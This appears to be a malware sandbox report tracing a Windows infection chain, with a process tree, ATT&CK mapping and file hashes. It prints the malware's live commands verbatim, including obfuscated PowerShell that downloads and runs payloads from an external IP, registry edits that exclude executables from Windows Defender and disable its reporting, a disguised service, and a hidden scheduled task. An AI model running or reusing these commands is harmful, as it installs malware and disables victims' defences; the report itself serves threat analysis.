"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff6b3e05460,0x7ff6b3e05470,0x7ff6b3e05480
5⤵
PID:4192

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,10761909257218000408,4425017163341742623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6172 /prefetch:8
4⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:480

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
3⤵
- Loads dropped DLL
PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 604
4⤵
- Program crash
PID:5112

C:\Users\Admin\AppData\Local\Temp\Info.exe
"C:\Users\Admin\AppData\Local\Temp\Info.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1292

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5028

C:\Users\Admin\Documents\493J_Ng8euItqV3N4QjQ42Gp.exe
"C:\Users\Admin\Documents\493J_Ng8euItqV3N4QjQ42Gp.exe"
3⤵
PID:5252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1264
4⤵
- Program crash
PID:5208

C:\Users\Admin\Documents\jOGVUrbTEXSIsTEOXBX1ZeGS.exe
"C:\Users\Admin\Documents\jOGVUrbTEXSIsTEOXBX1ZeGS.exe"
3⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im jOGVUrbTEXSIsTEOXBX1ZeGS.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\jOGVUrbTEXSIsTEOXBX1ZeGS.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5400

C:\Windows\SysWOW64\taskkill.exe
taskkill /im jOGVUrbTEXSIsTEOXBX1ZeGS.exe /f
5⤵
- Kills process with taskkill
PID:7144

C:\Users\Admin\Documents\rbn5OGjd1ES7iqwntlB9YJPl.exe
"C:\Users\Admin\Documents\rbn5OGjd1ES7iqwntlB9YJPl.exe"
3⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 460
4⤵
- Program crash
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 480
4⤵
- Program crash
PID:5168

C:\Users\Admin\Documents\mCupCKosHBwo1XRh_POQ2IJw.exe
"C:\Users\Admin\Documents\mCupCKosHBwo1XRh_POQ2IJw.exe"
3⤵
PID:5480

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:5340

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:6800

C:\Users\Admin\Documents\IjgBZynzkQWXGSLPyZQW6snF.exe
"C:\Users\Admin\Documents\IjgBZynzkQWXGSLPyZQW6snF.exe"
3⤵
PID:5464

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:5172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:6244

C:\Users\Admin\Documents\9908crXItPx5cbmpriOBnkj_.exe
"C:\Users\Admin\Documents\9908crXItPx5cbmpriOBnkj_.exe"
3⤵
PID:5456

C:\Users\Admin\Documents\7PY7Oo53u2Rn70PwKq59XjrA.exe
"C:\Users\Admin\Documents\7PY7Oo53u2Rn70PwKq59XjrA.exe"
3⤵
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 460
4⤵
- Program crash
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 480
4⤵
- Program crash
PID:4768

C:\Users\Admin\Documents\DVXXJTfviLqbro954evnsuiL.exe
"C:\Users\Admin\Documents\DVXXJTfviLqbro954evnsuiL.exe"
3⤵
PID:5440

C:\Users\Admin\Documents\c9sPru6pBATeVQBcAv0Ris_Y.exe
"C:\Users\Admin\Documents\c9sPru6pBATeVQBcAv0Ris_Y.exe"
3⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\6539025b-fa72-4d99-a3ff-665b53d49382.exe
"C:\Users\Admin\AppData\Local\Temp\6539025b-fa72-4d99-a3ff-665b53d49382.exe"
4⤵
PID:5504

C:\Users\Admin\Documents\g3R8G2hGETX0Dj5CSU3p4mKN.exe
"C:\Users\Admin\Documents\g3R8G2hGETX0Dj5CSU3p4mKN.exe"
3⤵
PID:5424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 460
4⤵
- Program crash
PID:6264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 468
4⤵
- Program crash
PID:3684

C:\Users\Admin\Documents\Pk4miWWnkfC8GsCxmxbFWDqt.exe
"C:\Users\Admin\Documents\Pk4miWWnkfC8GsCxmxbFWDqt.exe"
3⤵
PID:5508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:5680

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:512

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:1436

C:\Users\Admin\Documents\bM3uAOAVr8YhaDD5qMIznYDZ.exe
"C:\Users\Admin\Documents\bM3uAOAVr8YhaDD5qMIznYDZ.exe"
3⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 624
4⤵
- Program crash
PID:6292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 632
4⤵
- Program crash
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 660
4⤵
- Program crash
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 588
4⤵
- Program crash
PID:6440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 624
4⤵
- Program crash
PID:5268

C:\Users\Admin\Documents\XI0su0QdfW__BPEG23HPlJma.exe
"C:\Users\Admin\Documents\XI0su0QdfW__BPEG23HPlJma.exe"
3⤵
PID:5536

C:\Users\Admin\Documents\uhEi2aSTOEi6UEA4V7SDmSUp.exe
"C:\Users\Admin\Documents\uhEi2aSTOEi6UEA4V7SDmSUp.exe"
3⤵
PID:5520

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:6236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1020
4⤵
- Program crash
PID:6004

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1064
4⤵
- Program crash
PID:1868

C:\Users\Admin\Documents\OdJIcvbch_zcnvLFBD8dA_zp.exe
"C:\Users\Admin\Documents\OdJIcvbch_zcnvLFBD8dA_zp.exe"
3⤵
PID:5576

C:\Users\Admin\Documents\xcxHWV1fFHEJkFLNE9dsyTn7.exe
"C:\Users\Admin\Documents\xcxHWV1fFHEJkFLNE9dsyTn7.exe"
3⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
"C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
4⤵
PID:4876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:5140

C:\Users\Admin\Documents\dNb8mdPUgGwhW9i5X0sfHi_6.exe
"C:\Users\Admin\Documents\dNb8mdPUgGwhW9i5X0sfHi_6.exe"
3⤵
PID:5668

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sckapamo\
4⤵
PID:6944

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xfaywlgv.exe" C:\Windows\SysWOW64\sckapamo\
4⤵
PID:7080

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create sckapamo binPath= "C:\Windows\SysWOW64\sckapamo\xfaywlgv.exe /d\"C:\Users\Admin\Documents\dNb8mdPUgGwhW9i5X0sfHi_6.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:6172

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description sckapamo "wifi internet conection"
4⤵
PID:5228

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start sckapamo
4⤵
PID:6652

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:7088

C:\Users\Admin\Documents\nFdPGTHJ2jMyZKbmfyKQ2tW5.exe
"C:\Users\Admin\Documents\nFdPGTHJ2jMyZKbmfyKQ2tW5.exe"
3⤵
PID:5684

C:\Users\Admin\AppData\Local\Temp\7zSEFAD.tmp\Install.exe
.\Install.exe
4⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\7zSC5C.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:6888

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:6036

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:5372

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:6012

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:5840

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:3484

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:1896

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:5992

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:4388

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gkzHeWPyf" /SC once /ST 00:14:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:5168

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gkzHeWPyf"
6⤵
PID:7048

C:\Users\Admin\Documents\iD9Pf3KtZGDBryybDsNQA7uO.exe
"C:\Users\Admin\Documents\iD9Pf3KtZGDBryybDsNQA7uO.exe"
3⤵
PID:5676

C:\Users\Admin\AppData\Local\Temp\JE7MD.exe
"C:\Users\Admin\AppData\Local\Temp\JE7MD.exe"
4⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\HF15F.exe
"C:\Users\Admin\AppData\Local\Temp\HF15F.exe"
4⤵
PID:6352

C:\Users\Admin\AppData\Local\Temp\KCEM4.exe
"C:\Users\Admin\AppData\Local\Temp\KCEM4.exe"
4⤵
PID:6632

C:\Users\Admin\AppData\Local\Temp\M3KGI.exe
"C:\Users\Admin\AppData\Local\Temp\M3KGI.exe"
4⤵
PID:6876

C:\Users\Admin\AppData\Local\Temp\6CFDJ.exe
"C:\Users\Admin\AppData\Local\Temp\6CFDJ.exe"
4⤵
PID:6332

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\System32\regsvr32.exe" -S .\b0EiM8L.W -U
5⤵
PID:3284

C:\Users\Admin\AppData\Local\Temp\73L7H394M06H69J.exe
https://iplogger.org/1nChi7
4⤵
PID:1320

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
PID:4344

C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe
"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"
2⤵
- Executes dropped EXE
PID:1624

C:\Users\Admin\AppData\Local\Temp\pzyh.exe
"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4836

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:4768

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Installation.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4324

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
2⤵
- Suspicious use of WriteProcessMemory
PID:2224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffb285446f8,0x7ffb28544708,0x7ffb28544718
3⤵
PID:4068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,516464619216101209,8655716127266587672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
3⤵
PID:388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,516464619216101209,8655716127266587672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2320 -ip 2320
1⤵
PID:4704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5528 -ip 5528
1⤵
PID:6168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5424 -ip 5424
1⤵
PID:5168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5448 -ip 5448
1⤵
PID:4788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5496 -ip 5496
1⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5496 -ip 5496
1⤵
PID:7012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5448 -ip 5448
1⤵
PID:7072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5424 -ip 5424
1⤵
PID:7164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 5520 -ip 5520
1⤵
PID:6240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5528 -ip 5528
1⤵
PID:6620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5668 -ip 5668
1⤵
PID:6204

C:\Windows\SysWOW64\sckapamo\xfaywlgv.exe
C:\Windows\SysWOW64\sckapamo\xfaywlgv.exe /d"C:\Users\Admin\Documents\dNb8mdPUgGwhW9i5X0sfHi_6.exe"
1⤵
PID:1708

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:5288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 520
2⤵
- Program crash
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5252 -ip 5252
1⤵
PID:6820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1708 -ip 1708
1⤵
PID:6964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5528 -ip 5528
1⤵
PID:7076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5520 -ip 5520
1⤵
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5528 -ip 5528
1⤵
PID:7120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5520 -ip 5520
1⤵
PID:6404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5528 -ip 5528
1⤵
PID:7116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

New Service

T1050

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
cc3d422c6d840a541c9404b8c9962c2e

SHA1
7b556ccffa8bc57a9e912bf011d5e4ef3a485555

SHA256
198ba1537503a6b96c2c5c0b8f66f33c0b95474abd236f4bb8566fd42a93cbb9

SHA512
9863ab2e59a4cc89649143925530b6d706acc78d861966da29f8beaf2da782f36ee03e35593c2a386232946ea8b6dd3c36f5c23a84ccca06e38040a0248981fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
MD5
78afdcc28744f3ccc897189551e60a14

SHA1
6408c2447363d821dc659254a324456ed16207ec

SHA256
ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

SHA512
8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

Download Submit
